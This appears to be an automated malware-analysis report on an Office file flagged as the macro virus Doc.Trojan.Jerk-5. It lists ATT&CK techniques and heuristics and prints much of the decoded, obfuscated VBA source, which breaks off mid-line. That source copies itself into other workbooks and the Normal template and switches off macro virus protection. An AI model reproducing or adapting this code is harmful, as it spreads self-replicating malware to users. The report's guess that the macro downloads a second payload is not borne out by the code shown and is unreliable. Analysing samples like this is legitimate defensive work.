MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The file contains malicious VBA macros, indicated by the 'OLE_VBA_MACROS' heuristic and ClamAV detection 'Doc.Trojan.Jerk-5'. The 'GetObject' call suggests an attempt to execute external code. The VBA macro code, though obfuscated, likely aims to download and execute a secondary payload, a common tactic for this type of malware.
Heuristics 3
-
ClamAV: Doc.Trojan.Jerk-5 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Jerk-5
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject call
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 37394 bytes |
SHA-256: 7047e3a46fe281c321d14bc7dc228091833492a9be48f9c301d99a2ea81c080c |
|||
|
Detection
ClamAV:
Doc.Trojan.Jerk-5
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True ' 03:52:49: 오후 - Monday, 8 Nov 1999 ' 조병현 ' Private Sub Workbook_Deactivate() On Error Resume Next Const JJSCLQOYY = 1, SPRQV = True, GWUNWRL = False, PWAODAHUPV = 0 Dim XOVGG, RATDE As String Dim QJDYRTTFQPABTXO, QFWDYJTSW As Integer Dim TLIFV As Boolean RATDE = "ThisWorkbook" XOVGG = Application.ThisWorkbook.VBProject.VBComponents.Item(JJSCLQOYY).codemodule.Lines(1, Application.ThisWorkbook.VBProject.VBComponents.Item(JJSCLQOYY).codemodule.CountOfLines) Call UWPTVQZQBH(XOVGG) For QJDYRTTFQPABTXO = JJSCLQOYY To Application.Workbooks.Count TLIFV = GWUNWRL For QFWDYJTSW = JJSCLQOYY To Application.Workbooks.Item(QJDYRTTFQPABTXO).VBProject.VBComponents.Count If Application.Workbooks.Item(QJDYRTTFQPABTXO).VBProject.VBComponents.Item(QFWDYJTSW).codemodule.CountOfLines = PWAODAHUPV Then If Application.Workbooks.Item(QJDYRTTFQPABTXO).Path <> "" And Application.Workbooks.Item(QJDYRTTFQPABTXO).Saved = SPRQV And TLIFV = GWUNWRL Then TLIFV = SPRQV Application.Workbooks.Item(QJDYRTTFQPABTXO).VBProject.VBComponents.Item(QFWDYJTSW).codemodule.InsertLines JJSCLQOYY, XOVGG If Application.Workbooks.Item(QJDYRTTFQPABTXO).VBProject.VBComponents.Item(QFWDYJTSW).Name = RATDE Then Application.Workbooks.Item(QJDYRTTFQPABTXO).VBProject.VBComponents.Item(QFWDYJTSW).codemodule.ReplaceLine JJSCLQOYY * 33, "Private Sub Workbook_Deactivate()" Else Application.Workbooks.Item(QJDYRTTFQPABTXO).VBProject.VBComponents.Item(QFWDYJTSW).codemodule.ReplaceLine JJSCLQOYY * 33, "Private Sub Worksheet_Deactivate()" End If End If Next QFWDYJTSW If TLIFV = SPRQV Then Application.Workbooks.Item(QJDYRTTFQPABTXO).Save Next QJDYRTTFQPABTXO End Sub Private Sub Document_Close() On Error Resume Next Const SPRQV = True, GWUNWRL = False, PWAODAHUPV = 0, JJSCLQOYY = 1, BBQYAYDHQDLAS = wdFormatDocument, JHVJWVLIWJL = wdFormatTemplate, GTOYNYL = ":" Dim TLIFV, JCIOGLQ, KRFJRBSHCJK, YMDKDPYQSJM As Boolean Dim SJMTIBIDBOZY, CKUWLVFNSN As Object Dim JUDYXAATGQHODP, XOVGG As String If Month(JJSCLQOYY * Now) > JJSCLQOYY * 2 + JJSCLQOYY * 3 And Day(JJSCLQOYY * Now) = 4 + JJSCLQOYY * 10 Then MsgBox "V guvax " & Application.UserName & " vf n ovt fghcvq wrex!", 0, "www.all.net" Set SJMTIBIDBOZY = ActiveDocument.VBProject.VBComponents.Item(JJSCLQOYY) Set CKUWLVFNSN = NormalTemplate.VBProject.VBComponents.Item(JJSCLQOYY) Randomize KRFJRBSHCJK = GWUNWRL YMDKDPYQSJM = GWUNWRL If SJMTIBIDBOZY.codemodule.CountOfLines <> PWAODAHUPV Then KRFJRBSHCJK = SPRQV If CKUWLVFNSN.codemodule.CountOfLines <> PWAODAHUPV Then YMDKDPYQSJM = SPRQV Options.VirusProtection = GWUNWRL If (KRFJRBSHCJK = SPRQV Xor YMDKDPYQSJM = SPRQV) And (ActiveDocument.SaveFormat = BBQYAYDHQDLAS Or ActiveDocument.SaveFormat = JHVJWVLIWJL) Then If KRFJRBSHCJK = SPRQV Then JCIOGLQ = NormalTemplate.Saved XOVGG = SJMTIBIDBOZY.codemodule.Lines(JJSCLQOYY, SJMTIBIDBOZY.codemodule.CountOfLines) Call WJSEFKVJJAXOYH(XOVGG) If Int(Rnd * 10 * JJSCLQOYY) = JJSCLQOYY * 7 Then Call WXBKXZLPIZXDIJ(XOVGG) Call RZYEJOJ(XOVGG) CKUWLVFNSN.codemodule.InsertLines JJSCLQOYY, XOVGG If JCIOGLQ = SPRQV Then NormalTemplate.Save End If JUDYXAATGQHODP = Mid(ActiveDocument.FullName, 2, JJSCLQOYY) If YMDKDPYQSJM = SPRQV And (JUDYXAATGQHODP = GTOYNYL Or ActiveDocument.Saved = GWUNWRL) Then TLIFV = ActiveDocument.Saved XOVGG = CKUWLVFNSN.codemodule.Lines(JJSCLQOYY, CKUWLVFNSN.codemodule.CountOfLines) Call RZYEJOJ(XOVGG) SJMTIBIDBOZY.codemodule.InsertLines JJSCLQOYY, XOVGG If TLIFV = SPRQV Then ActiveDocument.Save End If End If End Sub Private Sub WXBKXZLPIZXDIJ(ByRef XOVGG As String) On Error Resume Next Const YFYLO = 48, GNINRCIJTGZJAS = 15, ZVSZYI = 5, BURWUC = 65, LNOJAASHJY = 90, JJSCLQOYY = 1, SPRQV = True, GWUNWRL = False Dim XMQNYDYG, XVVPHPCETmp, RDFMJCLWLKEW, XVVPHPCE(JJSCLQOY ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.